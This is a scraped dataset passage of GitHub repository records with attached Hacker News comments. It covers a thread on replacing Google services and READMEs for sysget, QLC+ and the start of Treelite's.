ProFirst two are stock photo sites, last one is an Android app for browsing local pictures. Google Images is a search engine for images, which is covered by the \"Google Search\" section anyways. Perhaps you confused Google Images with Google Photos (which is missing from the list), but even then the alternatives don't make sense.I'm currently on with this.Got my own domain, starting to change over accounts to new email. My webservers are at home, my NAS is being built.I'm getting GrapheneOS because I love my PinePhones but can't quite use one exclusively yet.Youtube: Odysee (with an extension that auto redirects youtube to odysee if it exists for the video)\nI only use google for youtube (if the content isn't on odysee) and gmail.How are the gmail alternatives? Can I use my custom domain for free on any?\nHave self-hosting solutions come close to gmail with spam filters?Google locked me out of my gmail a while ago, luckily I had moved almost everything away from Google that was important. My recovery email is a defunct me.com address back from when I was an iToddler. So effectively, THEY de-Googled ME lol.I went through the process of de-Googling my life a few months ago after the announcement that the free tier of GAFYD was finally going away. I had been wanting to do the change for years but postponing it out of laziness, and that was the trigger that finally did it. (I know they backtracked on their decision, but I'm glad I ripped off the band-aid.)Here is the excruciating process I had to follow in more detail, in case it may help anyone else: https://jmmv.dev/2022/03/abandoning-gafyd.htmlHere are some of my additional recommendations:Analytics - GoatCounter, Counter.devKeyboard - Unexpected Keyboard (A very cool keyboard)Search - NeevaTranslate - LingvaSome notes on the post:- Protonmail as a company doesn\u2019t have a very stellar reputation. I recommend hosting an e-mail server by yourself, or just use providers like Disroot Mail- K9 Mail is an email client, not an email providerHeretic take on this: Block first, figure out later. This is how we approach most technical issues anyways.So take /etc/hosts or little snitch or whatever and hard block .google., googletagmanager etc. - all sorts of domains that you come across from google.Then, when you run into something that doesn't work, figure it out at that moment.I\u2019ve moved away from Chrome and Google Search. But I\u2019m struggling to move away from Gmail, especially since this email is linked to so many critical official accounts (bank, government agencies)Any solutions to make the transition easier outside of manually updating email everywhere?Also, what\u2019s the best alternative to Gmail currently that will support using my own domain name?>AppsNo. Stop using smartphones. GNU/Linux and FOSS only.forget Duckduckgo and replace it with* anyone from https://searx.space/ or\n* https://metager.org/i dont i just accepted my fateThe advice and practical suggestions of this post are great, but for those who claim to have a hard time leaving google behind regardless (without a major business or work obligation that makes it difficult), the drama is overblown. It's not only possible, it's also relatively easy. I use google for exactly four things: Two gmail addresses for random crap emails and obligatory sign-ups if I want some document (serious email goes to a protonmail address); a phone with Android built into it (invasive but meh, I keep my smartphone engagement to enough of a minimum that it isn't a huge invasion of privacy); Google maps for random addresses and youtube for music I seek (and later download anyway), which in any case can be used without signing in.That's it. The rest is easily superfluous for most personal uses and I suspect that claiming otherwise is pure self absorbed convenience-hunting.I have been quasi-DeGoogleified for nearly a decade.The main thing standing in my way is the family domain hosted by Google. There are few enough of us, not using it for anything but family stuff, that Google is letting us keep it for free. Though I have an account at that domain (since I'm the administrator), I don't use the domain anymore.Other than that, except for an occasional foray into YouTube and a !g search when DDG isn't satisfactory, I pretty much ignore Google. I'm still more entangled than I want to be, but better than I was.Is there any privacy benefit to using the \u2018Mail\u2019 app on an iPhone over installing the gmail app from google?For my WordPress site, I replace Google Analytics with Koko Analytics. It provides list visitor information. But, I really just care to see which pages are most popular.Totally agree. Anything Google is off limits. The only exception is open source Android that has been thoroughly scrubbed. I currently use e/OS.1. Ensure all docs/pics are backed up somewhere on a PC I own\n2. Discard smartphone\n3. Delete gmail account\n4. Enjoy a peaceful and productive life!When I started \"deGoogling\" myself a year ago, the first step was to stop using Gmail. When changing my registered e-mail address everywhere on the Internet there was one crucial bit that I completely overlooked: the owner/tech/billing/etc. contact records of a domain that I own. Many registrars send all regular communications to the e-mail address of the user account, not to those in the domain contact records, so I happily went on thinking I was entirely \"deGmailed\" once my Gmail inbox had dried up as planned. If I had somehow lost access to that old Gmail address before I realized my mistake, that domain would effectively no longer be mine.deGoogling is great, but I don't want any corporations to track me or have data about me, and unfortunately the alternatives to Google are usually not any better in this respect.They might, like DDG, promise not to track me and to respect my privacy, but as an ordinary user I have absolutely no way of verifying their claims.I don't trust Vimeo any more than YouTube. I don't trust Authy any more than Google Authenticator. FastMail is great, but I don't want it to have my email any more than Gmail. I don't trust Firefox any more than Chromium.Unfortunately the internet and computers in general were never designed to respect privacy and most corporations are happy to collect data on their users... and I'm pretty pessimistic on this changing much for the typical user... If anything it's only going to get worse as tracking technology becomes ever more sophisticated and omnipresent.That's not to say we shouldn't deGoogle. But we should be under no illusion that that alone will somehow magically make our online lives private.For maps, You should add Organic maps. People tend to like the UI more than OsmAnd.Personally, I use OsmAnd with custom map files for better address coverage: https://github.com/pnoll1/osmand_map_creation.Google Analytics -> Plausible.ioGoogle Drive -> Mega.nzi think those who go through all this hassle must value their data more than their time.most of these services are inferior to the google service imo. and many of these alternatives may leak or sell your data too.if you're paranoid then DTA. it's far better to hide in the crowd then to use some browser developed by 4 people with anime emojis on github.also, I trust google won't get hacked far more than the others.better solution would be to obfuscate your data as much as possible.Yes, with the following exceptions:- YouTube has content that I enjoy and isn't available elsewhere. I know that it stores my history but I find its recommendations and multi-device support good enough that I consider it worth it. (Also, FWIW, you can disable the history using [0], it also has an autodelete, though I don't use it)- I drive and in my region, nothing is good enough for driving directions aside from Google Maps. I've tried all the other major apps on iOS like TomTom, Sygic etc. but they just don't work well enough.- Again, while driving, I use Android Auto on a device dedicated to that purpose. It's also the only situation where I use Google's voice recognition. I do so because I speak English in my daily life (e.g. song titles) but my region is German-speaking (e.g. places/street names/business names/addresses) and I need to be able to use both while driving. Only Google Assistant/Android Auto can be configured to recognise two languages.[0]: https://myactivity.google.com/activitycontrols?settings=yout...Every google feature you replace with a paid feature is one step closer to the internet freezing over. You cut out the big (free to consumer/product) data farms and soon the internet experience becomes like Cable Tv, you pay for channels/features on-top of ISP access.I don't really have an argument against this happening, capitalism will force it if it's an option. It's worth noting the internet the millenials and gen x'ers built, the internet we grew up on, could be gone forever and we are seeing it start to go now. The free web might become an altogether unpleasant place.Google's data centres aren't the Borg hive-mind. They are the future glaciers that will be mined for knowledge and ideas much later on.iPhone, DDG, hosts.etc> you will appreciate not having ads targeted to you or your devices constantly connecting to transmit data to servers.Why would I appreciate seeing more generic ads?I'm using Tresorit instead of Drive since about one year. Working fine. So far not considering leaving that service.1. Bought a couple of personal domains and signed-up with Fastmail. Configured Fastmail to periodically pull emails from my legacy gmail account. I use the Fastmail webapp on desktop and their android app on phone/tablet.2. Removed google analytics from my personal website/blog.3. Uninstall Chrome on desktops and disable it on Android phone/tablet.4. Use Firefox with Multi Account Containers add-on so that I am by default signed-out of google unless I need to do specific things, which are sandboxed in specific tabs.5. Paid for Kagi search and set it as the default search provider on my desktops and devices.6. Migrated a few legacy accounts from Google oauth sign-in to email/password.Still to do:a. Migrate my calendars from Google to Fastmail. For various reasons I need to be able to share calendars on Google and I haven't had time to sort this out.b. Migrate off Google Photos. I take a lot of pics with my phone and google photos is just so convenient. I try to only keep six months of pictures on google and archive the rest to a machine that I own.c. Google Movies/TV. I have a fair amount of bought content, mainly because its convenient to stream on a tablet. Not sure what the solution is there.d. I still find google maps useful for a few things - particularly as a way to discover opening hours for businesses. My car has a built-in, non-android, GPS so I don't use google maps for driving.e. I still have an android phone and tablet, and I'm sure they're still phoning home about me.I moved to China and had to do it, then after returning back I really didn't miss their services, only Google apps in my phone without gapps are Gtranslate, which I really don't use and have it only just in case, sadly DeepL didn't have comparable app, I use also Gboard (with no internet access in firewall) since it's currently best swipe keyboard and that's it, everything else I use from other companies and find apps from Google inferior, I also use Google search but through my preferred browser (Kiwi in mobile, Vivaldi on desktop).Email - AquamailCalendar - Business calendar pro 1.*IM - Whatsapp (network effect sadly, otherwise I would go with Element, used for years Signal but was sick of horrible UX)Maps - Mapy.czSMS - Pulseapp store - Aurora store, I know I know it's cheating...2FA - AndOTPGallery - Simple gallery proBtw Duckduckgo is horrible shady search engine, you are better off even with Google or Bing, though Kagi, Searx and Brave Search are better.I've got a legacy free gsuite account with two domains, one is personal the other business. I never got the option to keep it free for personal use, but also since it's still in the 3rd week of transitioning from free, I have no support. Without human support I can't split out the business domain into its own paid workspaces account, the tools I have access to don't have the option.I have no motivation to de-Google except how horrible Google has been about this transition, so far making it impossible through circular logic.I guess I'd have to do a takeout of the business domain, then delete that domain. Then open a new workspaces account and import the takout. Then handwave magic, I somehow get Google's attention to get the personal workspaces free instead of just automatically shutoff as their support docs claim will happen. Since I might have to migrate this one domain to some other service anyway, I might as well move the other domain too because it's easier to manage the two domains with a single interface even if they are separate accounts. So yeah, Google themselves are the how I will deGoogle, seems like.Google forced my hand with their decision to punish Apps for your Domain users. I was so angry at the decision that I moved to iCloud+ Custom Domain and made DuckDuckGo my default search engine and switched to safari. I will never, ever use another Google product. My Apps account was essentially just a custom domain on a Gmail interface and Cost them no more resources than Gmail, and presumably they got all the same benefits via ad tracking, so it felt particularly unnecessary to cancel.I don't use any of Google services or products.Fairphone 3+ with /e/OSFirefox + uBlock + uMatrix + NoScriptDuckduckgoTutanota (mail, calendar) and ecloud (mail, calendar, notes, tasks)Quad9 DNSSyncThingOpenStreetMapMagic EarthDeepLWeTransfer doesn't belong to Alphabet \u2014 it's an independent Dutch company. Netflix doesn't either.I use ungoogled-chromium and I'm pretty happy with it https://github.com/ungoogled-software/ungoogled-chromiumI should move away from Gmail too but that's the hardest part imo. I mostly have trust issues if that make sense. Not that I trust Google that much but I just don't know if any other email service will be around in 20 years or so. Probably Microsoft and Apple? iCloud Mail sounds good just don't have any experience with it (and it only works with custom domains afaik)No. I don't care. I'm happy to hide in the crowd.IMHO any data I generate is basically useless chaff. I still have yet to be convinced that there's a downside to this parasitic relationship. How exactly is my life, in a practical way, negatively impacted by this data going walkabout? Does it take years or months off my expected lifespan? Does it give me cavities? Does it turn my family and loved ones against me? Does it slow my typing speed?Point me to a good non-philosophical non-ideological non-emotional argument and I'll spend my time and money on transitioning to non-google sources for my problem-solutions.I doubt you can get rid of google like that.There is Google services that you and me don't know that we are using.What can be done is stop outgoing traffic to Google AS. \nYou can physically cut off internet connection for google devices.\nOr set rules on firewall.Isn't Brave based on Chromium (i.e. still some Google behind)?I never really \"googled\" it in the first place.Since I started using a smartphone/Android, I've been on CyanogenMod/LineageOS without Play services installed. I use FOSS apps from f-droid (Firefox, K-9 Mail, osmand~, DAVx5, Gadgetbridge, Signal) exclusively, and self-host the server-side of all my email (postfix/dovecot/amavis/opendkim) and CalDAV/CardDAV (radicale) stuff. I even set up my own public-ish DNS recursor that all networks I take care of use.Never regretted any of it, but I'm aware few will find it enjoyable taking care of some of this infrastructure. I am lucky that I do :)Partly, Google even helped me with the deprecation of the free gsuite. I never really found out what their solution was for private use, so I migrated the two domains I had.I still have a gmail account, which is kinda needed for YouTube Premium, which is a service I do enjoy.I've been looking/trying many search engines (you.com, duckduckgo, etc.). As someone who is not from the US, none of them is able to provide local search results anywhere as good as Google Maps. e.g. I want cheap food near me. Name of a local restaurant, etc. Until then, sadly I'll have to stick with Google.Also, Google Sheets & Docs are really really good too. I can live without Gmail.> Your data is worth a lotEhhhh, not so sure about this.\u2022 Your individual data is worth a lot of money in aggregate with the data of thousands/millions of other users, but it is difficult (impossible?) to exchange your individual data for money\u2022 If you're talking philosophical/non-monetary \"worth\" then this varies from person to person. I value my data almost not at all.A few weeks ago there was a post about Kagi[0] which is a paid search engine, I tried the trial and used all my searches, then immediately became a customer and have no regrets.[0] https://kagi.com/Phone:Pixel 4a with Graphene OS, only GCam Services Provider (https://github.com/lukaspieper/Gcam-Services-Provider) to be able to use Google Camera. Implementation is super simple and it shouldn't take long to see that it actually does nothing.Browser:Firefox - followed https://blackgnu.net/firefox-hardening-guide.html; Fennec on AndroidSearch - https://searx.space/ (plan on self hosting one)Youtube - https://docs.invidious.io/instances/ (plan on self hosting one)Passwords:Bitwarden - backups done regularly to encrypted external storage and encrypted rclone mountEmail:Tutanota/Protonmail + custom domain2FA:AegisMessaging:Signal - easiest way to setup for non-technical friends and family. Used to use a few different apps, but only use this right now. I also use https://meet.jit.si/ occasionally for calls on the laptop/desktop.VPN:Mullvad - currently working on setting up my own.Maps:Organic Maps on Android/Open Street Maps on desktop/laptop.Sync:Syncthing - syncing desktop, laptop, a few phones to my home server on LAN only.Notes:Markdown files kept on devices, synced through syncthing.Media:Emby - had issues with Jellyfin, but might revisit in a few months as I have some plans there.\nAirsonic - musicAdblocker:Mullvad + ublockoriginCalendar:TutanotaAnalytics for website:C# console app that parses caddy logs and clears logs after parsing.Cloud:Create encrypted mount with rclone and dump backups there when needed.It was a slow process to get here and I am lucky to have friends who followed me on this journey to be honest. The first step came while working for my final project at university and building something around my heavy dislike for Facebook. Once I had to research the subject more in depth I started to realize how wrong I was all these years entrusting troves of data to the highest bidder... I had a friend who had asked me about these things and I am sorry for not listening to him sooner, but I felt that he never went past \"bro, you shouldn't trust google!\". Which is I think what most of us do.I am trying to have conversations about this with everyone and try to adjust my language to their level. It's good because it highlights how little I know and it works both ways as I have to learn myself a bit more about any given topic. It's quite nice. It's even better to have people who have followed me on this path, moving to devices with no google services at all on them, moving away operating systems and so on.If you think you're stuck, try to get rid of an app or two and see how it goes. Most of them add little to NO value to your life and your tech stack so trust yourself and delete them. It took me about a year to fully get rid of any google related stuff (and I include micro G here to allow me to run stuff like WhatsApp/YT/Gmail/Maps). And I knew it's bad, so I imagine it's a lot harder if you don't think there are risks.Some things are more difficult, but my phone is now a tool that quietly sits on a desk somewhere in the house and I use it to do something specific. It's also reassuring to know it's not constantly feeding off me to send info to whoever is interested in my particular demographic.As an afterword, please, all of you who suggest open source alternatives, also keep in mind that most of these projects have very little financial support. A few dollars, euros, pounds might not mean much to you, but it could make the world of difference for all these people working to keep our data safe and our devices useful. Stop recommending people stuff and starting with \"it's free\" and phrase it with \"it's private and secure...\". Start introducing the cost early on. Without our support these alternatives can and will vanish or will morph to attempt to keep themselves alive.Personally, I created a chrome extension for myself where I track my own behavior locally and recommend myself content from sites i like (youtube/twitter/quora/etc) in a feed. Would rather have control over my own algorithm and own the data. Also it gives me flexibility. Turns out I do like these feeds just not when I don't own it haha.#ADMany of these services are SaaS solutions that require a separate ToS and SPoF. The idea behind de-googling should be focused on self-hosted alternatives, not just other service providers.I've been actively degoogling my life for about 10 years, mostly kicked off by Snowden's revelations. Off the top of my head, here's what's left:\u2022 YoutubeToo much content there to stop using. I almost never use it while logged in. I never subscribe: I bookmark the channel.\u2022 MapsToo useful to stop using. Haven't tried alternatives, but open to recommendations. Business locations and open/close times are must haves for me.\u2022 DuoIt's a videophone that mostly works.\u2022 ChromeI never stopped using Firefox as my main browser since ~2005, but I'll use Chrome from time to time, mostly for website development and watching Youtube.\u2022 GMailI've almost completely moved off it about a year ago for Fastmail, but I keep checking my existing GMail. Probably should get around to moving over completely.\u2022 AndroidI'm a recent LineageOS convert, but still use it with the Play Store.I never trusted google, so first step to degoogling is actually never start to use google products.However there are few tools that has no competition yet. Unfortunately. YouTube and Gboard with swipe (for non English lang).The only trace left from Google in my life is search. No, DDG is unfortunately nowhere near Google Search.The day I could replace that too, I'll try my best not to touch a Google product ever again.I switched back to FF the day I noticed that I could \"log in\" to Chrome, and that the browser had already logged me in by default.Also switched to ProtonMail for anything shopping or bill-related, and paid for a ProtonVPN subFor me, talk about \"de-googling\" and other such processes comes down to really thinking about what your goals are. It's easy to get into a binary all-or-nothing frame of reference, which I don't think is constructive as for most use cases \"some\" is still significantly different from \"none.\"My own goals/use cases:- I'm unhappy with the current economics of the online world, that are based on advertising. I accept that developing products requires money, and getting money requires a business model, so if I don't like the incentives ad-based business creates, I should actively support alternative models- I'm unhappy with the intrusiveness of tracking. I think consent is important -- not as a legal concept, but as a regular human being understands it. When I interact with a person or organization, I can meaningfully give consent for their actions. I can't meaningfully give consent to what some third party who isn't part of that interaction does, regardless of the legal fine print that says.- I'm happy that the internet has become mainstream and people who aren't \"tech people\" use it.- I'm not concerned with targeted attacks, but am concerned with opportunistic attacks against my online accounts and identities.- Yes, \"identities\" -- I believe people should be able to have multiple identities online.With those criteria, my current set up:- password manager -- no reusued passwords. Whole family uses this.- Fastmail. Because I use email so much, it's clearly a valuable service for me. So it' worth paying for -- I'm many years out from being a broke college student.- A domain I purchased just for emails, and make use of subdomain addressing. I tend to use a different subdomain email per service. Goes to the goal of multiple identities, reducing tracking and reducing opportunistic attacks- I've kept my gmail address and forward it to my fastmail, because I don't want to make my personal contacts use a different email address than they have for years. Maybe I'll change that some day, but I'm ok with _reducing_ rather than _eliminating_ google in my life- FireFox. Also Mozilla VPN, to give Mozilla some money, though in practice I don't really have a frequent use for VPN.- Duck Duck Go- Ublock Origin- Subscriptions to a handful of news outlets I read frequently. Print subscription for one of them!- Separate computer for work vs personalBiggest gap I'm still uncomfortable with: Shopping on Amazon.Shouldn't this post be clearly labeled a show hn: internxt, not an ask hn ?GrapheneOS! It's an amazing OS. The transition was quick and seamless and I was surprised that had to make zero sacrifices, because it allows you to create separate profiles. I have one profile with a Google Play Services sandbox, which the OS provides as a one-click install. It's useful to run banking/ride-sharing apps, etc. It's very quick to transition between profiles.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "emilengler/sysget", "link": "https://github.com/emilengler/sysget", "tags": [], "stars": 654, "description": "One package manager to rule them all", "lang": "C++", "repo_lang": "", "readme": "# sysget\n\n[![Build Status](https://travis-ci.org/emilengler/sysget.svg?branch=master)](https://travis-ci.org/emilengler/sysget)\n### A front-end for every package manager
\nsysget is a bridge that lets you use one syntax to every package manager on every unix-based operating system.
\nYou probably all know the problem when you are on a new distro and don't know anything about the package manager. With sysget you just need to remember one syntax for every package manager.
\nThe syntax is mostly same with apt so it should be easy to use.
\n### Supported package managers:\n* apt\n* xbps\n* dnf\n* yum\n* zypper\n* eopkg\n* pacman\n* emerge\n* pkg\n* pkg_mgr\n* chromebrew\n* homebrew\n* nix\n* snap\n* npm\n* flatpak\n* slapt-get\n* pip3\n* GNU guix\n* Ruby gems\n* MacPorts\n* Your own package manager (See Add your own package manager)\n\n### Features\n* search for packages\n* install packages\n* remove packages\n* remove orphans\n* clear package manager cache\n* update database\n* upgrade system\n* upgrade single package\n\n### How to install\nPlease take a look at the docs/ folder.
\nIn a nutshell:
\n```make && sudo make install```
\nNo dependencies needed\n\n### Example\nTo search for a package\n```\nsysget search \n```\nTo install a package\n```\nsysget install \n```\nTo remove a package\n```\nsysget remove \n```\nTo update the database\n```\nsysget update\n```\nTo upgrade the system\n```\nsysget upgrade\n```\nTo upgrade a specific package\n```\nsysget upgrade \n```\nTo remove orphans\n```\nsysget autoremove\n```\nTo clean the cache of the package manager\n```\nsysget clean\n```\n### Environment Variables\n| Environment Variable | Function |\n|----------------------|---------------------------------------------------------------------|\n| SYSGET_CONFIG_PATH | Ability to change the path of the sysget config file |\n| SYSGET_CUSTOM_PATH | Ability to change the path of the file for a custom package manager |\n| SYSGET_ARGS_PATH | Ability to change the path of the for custom arguments |\n### Configuration files\nThe file where the package manager is stored is located at `/etc/sysget/sysget`
\nThe *optional* file where a custom package manager is stored at `/etc/sysget/custom`
\n### Add your own package manager\nsysget also has the ability that you can add your own package manager.
\nSimply create the file /etc/sysget_custom and then write **8** lines into it.
\nOne line for one command.
\nThe order is: search, install, remove, autoremove, update, upgrade, upgrade_pkg, clean\n### Change the sysget syntax\nSimilar to adding your own package manager you can also modify the syntax of sysget. For example you can give sysget the pacman syntax
\nSimply create the file `/etc/sysget/args` and add 10 lines to it.\nThe order is: search, install, remove, autoremove, update, upgrade, clean, set, help, about
\nHowever there are some rules:
\n* The file needs to have 10 lines\n* The same item twice is forbidden\n### Languages\nWe support the following languages:\n* English\n* German\nThe data is get using $LANG, english is the fallback option\n###### Credits\n[TermGet](https://github.com/termget/termget)\n[JSON](https://github.com/nlohmann/json)\n", "readme_type": "markdown", "hn_comments": "I'm curious why the author chose to put every command in its own file and then copy the big if tree with string compares in every file.Translating commands from a generic command interface to specific commands is a great case for polymorphism.That's not nearly \"every package manager\".Topgrade [1] upgrades all packages including distribution package managers (such as Homebrew, APT, DNF, ...), language specific package managers (such as Cargo, NPM, Gem, ...), program specific package managers (such as Vim, Tmux, shells, ...), Flatpak/Snap, working on The Big Three (Windows, Linux, macOS).I wish there was a way to update Steam and Battle.net from the CLI as well.[1] https://github.com/r-darwish/topgradeThe title of the submission is a bit misleading:> GitHub: sysget \u2013 A front-end for every package manager (github.com)Right now, it seems like it is GitHub's own project when it's just hosted on GitHub.It should be:> Show HN: sysget \u2013 A front-end for every package manager (github.com)How does this handle edge cases like needing to run 'brew link' etc. occasionally?What happens when multiple package managers provide the same package?Seems like a cool idea!Just a thought, what if you allowed it to run in different modes, for people used to different systems? apt mode, yum mode, pacman mode etc to accept commands in that format.Obligatory xkcd: https://xkcd.com/1654/Missing flatpak :(Is packagekit completely dead and forgotten these days?There is also https://github.com/icy/pacapt(I much prefer pacman's interface over trying to remember which of dpkg/apt-get/apt-policy to use etc., similarly rpm/dnf)Where's conda?All it does is compare strings and shell out, should be written in something like Bash rather than C++.A wrapper around emerge? Nope...Some configuration management tools already abstract package managers. For example: https://puppet.com/docs/puppet/6.0/type.html#package.... why not PackageKit?pkcon is a good tool, even if a bit janky, that hides well lots of the differences between the several package managers it supports.I like this. This makes a lot of sense to me. If it managed to gain adoption into major distros, it would be incredibly good, though obviously that is a longshot for a lot of reasons.If you really want it to get adopted into major distros, the best approach is probably to convince the systemd folks that it would be a great addition to their package ;)edit: A bit of constructive criticism. I really like the concept, but I think the way that package managers are supported could be improved. I think it would be better if all of the handlers for a given package manager were in the same file, instead of having them spread across every file. There's obviously lots of ways to accomplish this.Also, as it is now, this project does not seem to use a ton of things that require C++ - you could shave some binary size cost by converting it to pure C.It seems nowadays people just upvote based on just the title. This is a switch statement wrapper around package managers, on the front-page of HN.On the surface this looks like a useful project. If you plan to use it, do yourself a favor and avoid looking at the source code.C++ is an \"interesting\" language choice. I would have expected a bash script. Equally portable, and no hassle with compilation for different arch/OS.Some missing features: - Show version of an installed package\n - List content of package\n - Fix package (or reinstall?)\n - Install/Update history\n - Revert last install/update operation\n\nUnfortunately not all of these features are directly supported by all package managers.\nE.g. package contents for yum are `repoquery -l`.\nI have to google this every time. Real value in wrapping that in a simple command.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mcallegari/qlcplus", "link": "https://github.com/mcallegari/qlcplus", "tags": ["c-plus-plus", "qt", "lighting", "enttec", "qml", "dmx", "dmx512", "dmxking", "artnet", "e131", "midi", "hid"], "stars": 653, "description": "Q Light Controller Plus (QLC+) is a free and cross-platform software to control DMX or analog lighting systems like moving heads, dimmers, scanners etc. This project is a fork of the great QLC project written by Heikki Junnila that aims to continue the QLC development and to introduce new features.", "lang": "C++", "repo_lang": "", "readme": "Q Light Controller Plus 4\n=========================\n\n![QLC+ LOGO](resources/icons/png/qlcplus.png)\n\nCopyright (c) Heikki Junnila, Massimo Callegari\n\nQLC+ homepage: https://www.qlcplus.org/\n\nQLC+ on GitHub: https://github.com/mcallegari/qlcplus\n\nDEVELOPERS AT WORK\n------------------\n\nIf you're compiling QLC+ from sources and you regularly do \"git pull\"\nto get the latest sources, you probably end up seeing some\ncompiler warnings and errors from time to time. Since the whole source package\nis under development, you might even encounter unresolved symbols etc. that\nhalt the compiler immediately. If such a thing occurs, you should do a \"make\ndistclean\" on qlcplus (top-most source directory) and then \"qmake\" and \"make\"\nagain. We attempt to keep the GIT master free of fatal errors and it should\ncompile all the time. However, some inter-object dependencies do get mixed up\nsometimes and you need to compile the whole package instead of just the latest\nchanges. Sometimes even that doesn't work, because QLC+ installs its common\nlibraries to system directories, where (at least unixes) fetch them instead\nof the source directory. In those cases, you might try going to the libs\ndirectory, compile it with \"make\" and install with \"make install\" and then\nattempt to re-compile the whole package with \"make\".\n\nApache 2.0 License\n------------------\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nRequirements - Linux\n--------------------\n\n* Qt >= 5.0 development libraries & tools\n* libudev-dev, libmad0-dev, libsndfile1-dev, libfftw3-dev\n* DMX USB plugin: libftdi-dev, pkg-config\n* HID plugin: No additional requirements\n* MIDI plugin: libasound, libasound-dev, pkg-config\n* ENTTEC Wing plugin: No additional requirements\n* OLA plugin: libola, ola-dev, pkg-config (see libs/olaout/README)\n* uDMX plugin: libusb, libusb-dev, pkg-config\n* Peperoni plugin: libusb, libusb-dev, pkg-config\n* Velleman plugin: Not available for Linux\n* OSC plugin: No additional requirements\n* ArtNet plugin: No additional requirements\n* E1.31 plugin: No additional requirements\n* Loopback plugin: No additional requirements\n\nRequirements - Windows\n----------------------\n\n* MSYS2 environment (https://msys2.github.io/)\n* DMX USB plugin: D2XX driver & development package (http://www.ftdichip.com/Drivers/D2XX.htm)\n* HID plugin: No additional requirements\n* MIDI plugin: No additional requirements\n* ENTTEC Wing plugin: D2XX driver & development package (http://www.ftdichip.com/Drivers/D2XX.htm)\n* OLA plugin: Not available\n* uDMX plugin: No additional requirements\n* Peperoni plugin: No additional requirements\n* Velleman plugin: K8062 SDK from www.velleman.eu\n* OSC plugin: No additional requirements\n* ArtNet plugin: No additional requirements\n* E1.31 plugin: No additional requirements\n* Loopback plugin: No additional requirements\n\nRequirements - Mac OS X\n-----------------------\n\n* XCode (http://developer.apple.com/technologies/tools/xcode.html)\n* Qt >= 5.0.x (http://download.qt.io/official_releases/qt/)\n* macports (https://www.macports.org/)\n* DMX USB plugin: macports, libftdi-dev, pkg-config\n* HID plugin: No additional requirements\n* MIDI plugin: No additional requirements\n* ENTTEC Wing plugin: No additional requirements\n* OLA plugin: libola, ola-dev, pkg-config (see libs/olaout/README)\n* uDMX plugin: macports, libusb-compat, pkg-config\n* Peperoni plugin: macports, libusb-compat, pkg-config\n* Velleman plugin: Not available\n* OSC plugin: No additional requirements\n* ArtNet plugin: No additional requirements\n* E1.31 plugin: No additional requirements\n* Loopback plugin: No additional requirements\n\nCompiling & Installation\n------------------------\n\nPlease refer to the online wiki pages: https://github.com/mcallegari/qlcplus/wiki\n\nSupport & Bug Reports\n---------------------\n\nFor discussions, feedbacks, ideas and new fixtures, go to:\nhttps://www.qlcplus.org/forum/index.php\n\nFor developers wiki and code patches, go to:\nhttps://github.com/mcallegari/qlcplus\n\nContributors\n------------\n\n### QLC+ 5:\n\n* Eric Arneb\u00e4ck (3D preview features)\n* Santiago Benejam Torres (Catalan translation)\n* Luis Garc\u00eda Tornel (Spanish translation)\n* Nils Van Zuijlen, J\u00e9r\u00f4me Lebleu (French translation)\n* Felix Edelmann, Florian Edelmann (fixture definitions, German translation)\n* Jannis Achstetter (German translation)\n* Dai Suetake (Japanese translation)\n* Hannes Bossuyt (Dutch translation)\n* Aleksandr Gusarov (Russian translation)\n* Vadim Syniuhin (Ukrainian translation)\n* Mateusz K\u0119dzierski (Polish translation)\n\n### QLC+ 4:\n\n* Jano Svitok (bugfix, new features and improvements)\n* David Garyga (bugfix, new features and improvements)\n* Lukas J\u00e4hn (bugfix, new features)\n* Robert Box (fixtures review)\n* Thomas Achtner (ENTTEC wing improvements)\n* Joep Admiraal (MIDI SysEx init messages, Dutch translation)\n* Florian Euchner (FX5 USB DMX support)\n* Stefan Riemens (new features)\n* Bartosz Grabias (new features)\n* Simon Newton, Peter Newman (OLA plugin)\n* Janosch Frank (webaccess improvements)\n* Karri Kaksonen (DMX USB Eurolite USB DMX512 Pro support)\n* Stefan Krupop (HID DMXControl Projects e.V. Nodle U1 support)\n* Nathan Durnan (RGB scripts, new features)\n* Giorgio Rebecchi (new features)\n* Florian Edelmann (code cleanup, German translation)\n* Heiko Fanieng, Jannis Achstetter (German translation)\n* NiKoyes, J\u00e9r\u00f4me Lebleu, Olivier Humbert, Nils Van Zuijlen (French translation)\n* Raymond Van Laake (Dutch translation)\n* Luis Garc\u00eda Tornel (Spanish translation)\n* Jan Lachman (Czech translation)\n* Nuno Almeida, Carlos Eduardo Porto de Oliveira (Portuguese translation)\n* Santiago Benejam Torres (Catalan translation)\n* Koichiro Saito, Dai Suetake (Japanese translation)\n\n### QLC:\n\n* Stefan Krumm (Bugfixes, new features)\n* Christian Suehs (Bugfixes, new features)\n* Christopher Staite (Bugfixes)\n* Klaus Weidenbach (Bugfixes, German translation)\n* Lutz Hillebrand (uDMX plugin)\n* Matthew Jaggard (Velleman plugin)\n* Ptit Vachon (French translation)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dmlc/treelite", "link": "https://github.com/dmlc/treelite", "tags": [], "stars": 653, "description": "model compiler for decision tree ensembles", "lang": "C++", "repo_lang": "", "readme": "# Treelite\n\n![Coverage tests](https://github.com/dmlc/treelite/actions/workflows/coverage-tests.yml/badge.svg)\n[![Documentation Status](https://readthedocs.org/projects/treelite/badge/?version=latest)](http://treelite.readthedocs.io/en/latest/?badge=latest)\n[![codecov](https://codecov.io/gh/dmlc/treelite/branch/mainline/graph/badge.svg)](https://codecov.io/gh/dmlc/treelite)\n[![GitHub license](http://dmlc.github.io/img/apache2.svg)](./LICENSE)\n[![PyPI version](https://badge.fury.io/py/treelite.svg)](https://pypi.python.org/pypi/treelite/)\n[![Conda Version](https://img.shields.io/conda/vn/conda-forge/treelite.svg)](https://anaconda.org/conda-forge/treelite)\n\n[Documentation](https://treelite.readthedocs.io/en/latest) |\n[Installation](http://treelite.readthedocs.io/en/latest/install.html) |\n[Release Notes](NEWS.md) |\n[Acknowledgements](ACKNOWLEDGMENTS.md) |\n\n**Treelite** is a model compiler for efficient deployment of decision 